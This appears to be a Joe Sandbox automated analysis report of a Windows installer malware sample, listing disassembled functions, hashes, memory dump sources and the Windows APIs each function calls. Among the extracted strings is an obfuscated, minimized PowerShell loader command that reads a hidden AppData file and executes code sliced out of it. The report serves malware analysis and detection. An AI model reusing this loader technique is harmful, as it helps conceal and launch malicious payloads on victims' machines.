                                                                                                                                            • Opcode Fuzzy Hash: 389a80ee12a651c87ccad1e400f0b61aee7e0e7ab3a8d76480836320ff4f5ec7
                                                                                                                                            • Instruction Fuzzy Hash: 2CD09222A4BE3062D55137663C0AFCF054C8F5631AB518077F908740C69A6D9A9249EE
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2395b39049a362c34a27dfb880213796ab4f3997f605305afcf4b88fff478a5b
• Instruction ID: 17d8f0c9adc7b2b71efc7957c866aa3859f64222e8b37881b9213324db3bf9cd
• Opcode Fuzzy Hash: 2395b39049a362c34a27dfb880213796ab4f3997f605305afcf4b88fff478a5b
• Instruction Fuzzy Hash: E0A15171E00228CBDF28CFA8C8447ADBBB1FB44305F15806ED856BB281D7789A96DF44
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e99653bfb7f144ce5dad25bea39bf75b689d07406e35084d2878a8dabe37ac6e
• Instruction ID: fc305786e35d93851c8f3c5d9b38f8a429e7909e60618e2c0103eac0a9dc1c25
• Opcode Fuzzy Hash: e99653bfb7f144ce5dad25bea39bf75b689d07406e35084d2878a8dabe37ac6e
• Instruction Fuzzy Hash: C1913071E00228CBDF28CF98C8547ADBBB1FB44305F15816AD856BB281D7789A96DF44
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fe53a61097b749f1782159a8fc3ae1334c5d5d5e9ac5eec79330ddb7b6ec713b
• Instruction ID: 045822fc5ab24079ba69da477224c4b1a41a130b0053ffb1807465ee2ef03bcb
• Opcode Fuzzy Hash: fe53a61097b749f1782159a8fc3ae1334c5d5d5e9ac5eec79330ddb7b6ec713b
• Instruction Fuzzy Hash: AB814771E00228CFDF24CFA8C8447ADBBB1FB45305F25816AD856BB281D7789A96DF44
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f03dec724b3596635aeae071b0dd6c0542c79984eb544c4ce6f813bf1c132c47
• Instruction ID: efdf2bc729d78145ecf5a565514c9258b5bbce2e4cf5113e346d1a35f2b936d2
• Opcode Fuzzy Hash: f03dec724b3596635aeae071b0dd6c0542c79984eb544c4ce6f813bf1c132c47
• Instruction Fuzzy Hash: AB817771E00228CBDF24DFA8C8447AEBBB0FB45305F15816AD856BB281D7785A96DF44
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b228df2ed3587aaf6c6f9f97010ba9ba02a5f9c90de50599b2abf323e58cb698
• Instruction ID: c983b8745f75bf2274a463a9cfcccf5039b1f1987fed19ece7001b5e7d797120
• Opcode Fuzzy Hash: b228df2ed3587aaf6c6f9f97010ba9ba02a5f9c90de50599b2abf323e58cb698
• Instruction Fuzzy Hash: 3F712371E00228CFDF28CF98C8447ADBBB1FB44305F15806AD856BB281D7789A96DF54
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f482201699af14bb3cd10cc7f775e8512ddaef9db8a966204fce1aae5b262981
• Instruction ID: 3e902398f65232741f3d3f2c7f6467c21586f7f50b1ebc0ee674bbd924b4c7fc
• Opcode Fuzzy Hash: f482201699af14bb3cd10cc7f775e8512ddaef9db8a966204fce1aae5b262981
• Instruction Fuzzy Hash: FA714671E00228CFDF28CF98C8447ADBBB1FB44305F15806AD856BB281D7789A96DF44
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
APIs
• GlobalFree.KERNEL32(00000000), ref: 00401B80
• GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B92
Strings
• "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" , xrefs: 00401B38, 00401B3E, 00401B58
Similarity
• API ID: Global$AllocFree
• String ID: "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)"
• API String ID: 3394109436-4270804791
APIs
  • Part of subcall function 00405EC1: FindFirstFileA.KERNELBASE(?,00421528,004210E0,0040577E,004210E0,004210E0,00000000,004210E0,004210E0,?,?,75573410,0040549D,?,C:\Users\user\AppData\Local\Temp\,75573410), ref: 00405ECC
  • Part of subcall function 00405EC1: FindClose.KERNELBASE(00000000), ref: 00405ED8
• lstrlenA.KERNEL32 ref: 004021CA
• lstrlenA.KERNEL32(00000000), ref: 004021D4
• SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004021FC
Similarity
• API ID: FileFindlstrlen$CloseFirstOperation
• String ID:
• API String ID: 1486964399-0
APIs
  • Part of subcall function 00404EA6: lstrlenA.KERNEL32(Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000,?), ref: 00404EDF
  • Part of subcall function 00404EA6: lstrlenA.KERNEL32(00402F92,Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000), ref: 00404EEF
  • Part of subcall function 00404EA6: lstrcatA.KERNEL32(Completed,00402F92,00402F92,Completed,00000000,0040E888,00000000), ref: 00404F02
  • Part of subcall function 00404EA6: SetWindowTextA.USER32(Completed,Completed), ref: 00404F14
  • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F3A
  • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F54
  • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F62
  • Part of subcall function 0040536C: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004214E0,Error launching installer), ref: 00405395
  • Part of subcall function 0040536C: CloseHandle.KERNEL32(?), ref: 004053A2
• WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
• GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
Similarity
• API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
• String ID:
• API String ID: 3521207402-0
APIs
• RegOpenKeyExA.KERNELBASE(80000002,00405CE9,00000000,00000002,?,00000002,?,?,00405CE9,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405ACD
• RegQueryValueExA.KERNELBASE(?,?,00000000,00405CE9,?,00405CE9), ref: 00405AEE
• RegCloseKey.KERNELBASE(?), ref: 00405B0F
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
  • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
• RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
• RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 0040247B
• RegCloseKey.ADVAPI32(?,?,?,noncontamination\lftebevgelse\,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
Similarity
• API ID: Enum$CloseOpenValue
• String ID:
• API String ID: 167947723-0
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• OleInitialize.OLE32(00000000), ref: 00404F88
  • Part of subcall function 00403EBF: SendMessageA.USER32(00010458,00000000,00000000,00000000), ref: 00403ED1
• CoUninitialize.COMBASE(00000404,00000000), ref: 00404FD4
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: InitializeMessageSendUninitialize
• String ID:
• API String ID: 2896919175-0
APIs
• GetFileAttributesA.KERNELBASE(00000003,00402C69,C:\Users\user\Desktop\HVSU7GbA5N.exe,80000000,00000003), ref: 00405852
• CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405874
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
APIs
• GetFileAttributesA.KERNELBASE(?,?,00405441,?,?,00000000,00405624,?,?,?,?), ref: 0040582E
• SetFileAttributesA.KERNEL32(?,00000000), ref: 00405842
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402274
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
APIs
• RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403068,00000000,00000000,00402EAE,000000FF,00000004,00000000,00000000,00000000), ref: 004058DA
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                            • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                            • Instruction ID: 18ab15d3875c8aca8147d786b71a19f163cd1be083ac94134eb356fb97c53e98
                                                                                                                                            • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                            • Instruction Fuzzy Hash: 9FE0EC3361425AEFDF10AE659C04AEB7B6CEF05360F008433FD15E2150D231E921EBA9
                                                                                                                                            APIs
                                                                                                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: bad0cb919f859e81d349d5dba00592a48f68b19ab23d0192a814859a48de207d
                                                                                                                                            • Instruction ID: 9169326a2aec8439feca5866952fa18bd92df46eb8b4a67c681bb8a0ef40d438
                                                                                                                                            • Opcode Fuzzy Hash: bad0cb919f859e81d349d5dba00592a48f68b19ab23d0192a814859a48de207d
                                                                                                                                            • Instruction Fuzzy Hash: CDD01277B08114E7DB00EBB9AE48A9E73A4FB50325F208637D111F11D0D3B98551EA29
                                                                                                                                            APIs
                                                                                                                                            • SendMessageA.USER32(00010458,00000000,00000000,00000000), ref: 00403ED1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                            • Opcode ID: 0196788a60c407a34fa8085170a73220ab74af89f50f0ba942ff060579b96adb
                                                                                                                                            • Instruction ID: b3c8485646d9c058ec71e9ab696a48b88cadb806b99eba66945500c977f65eb2
                                                                                                                                            • Opcode Fuzzy Hash: 0196788a60c407a34fa8085170a73220ab74af89f50f0ba942ff060579b96adb
                                                                                                                                            • Instruction Fuzzy Hash: 1EC04C717442007AEA218F509D49F1777586750701F5544257254A51D0C6B4E410D66D
                                                                                                                                            APIs
                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DF0,?), ref: 00403079
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FilePointer
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                            • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                            • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                                                                            • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                                                                            • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                                                                            APIs
                                                                                                                                            • SendMessageA.USER32(00000028,?,00000001,00403CD9), ref: 00403EB6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                            • Opcode ID: b349b1325232fe021fd412571e2c6441d382bb4e6ace6bfca539dacfea62cc2e
                                                                                                                                            • Instruction ID: 72d9328d989bd28a4b04e8d0bfc49dcb98a3c5c69b67aa4312834a6063493829
                                                                                                                                            • Opcode Fuzzy Hash: b349b1325232fe021fd412571e2c6441d382bb4e6ace6bfca539dacfea62cc2e
                                                                                                                                            • Instruction Fuzzy Hash: 54B01235685200BBEE324F00DD0DF497E72F764B02F008034B300240F0C6B300A5DB19
                                                                                                                                            APIs
                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00403C72), ref: 00403E9F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                            • Opcode ID: 9d98744450fa71a660f12360689da69116cf16b41945ad655af5f03ec15b630f
                                                                                                                                            • Instruction ID: 924e4898ca7b55125a55dbaf25208a334d7a0dcb277bd93e9961852eecaff849
                                                                                                                                            • Opcode Fuzzy Hash: 9d98744450fa71a660f12360689da69116cf16b41945ad655af5f03ec15b630f
                                                                                                                                            • Instruction Fuzzy Hash: 9BA00176808205ABCB029B60EF09D8ABF62BBA4705B028435E65594174DA325865FF9A
                                                                                                                                            APIs
                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 0040483B
                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404846
                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404890
                                                                                                                                            • LoadBitmapA.USER32(0000006E), ref: 004048A3
                                                                                                                                            • SetWindowLongA.USER32(?,000000FC,00404E1A), ref: 004048BC
                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048D0
                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048E2
                                                                                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 004048F8
                                                                                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404904
                                                                                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404916
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404919
                                                                                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404944
                                                                                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404950
                                                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049E5
                                                                                                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A10
                                                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A24
                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404A53
                                                                                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A61
                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404A72
                                                                                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B6F
                                                                                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BD4
                                                                                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BE9
                                                                                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C0D
                                                                                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C2D
                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 00404C42
                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00404C52
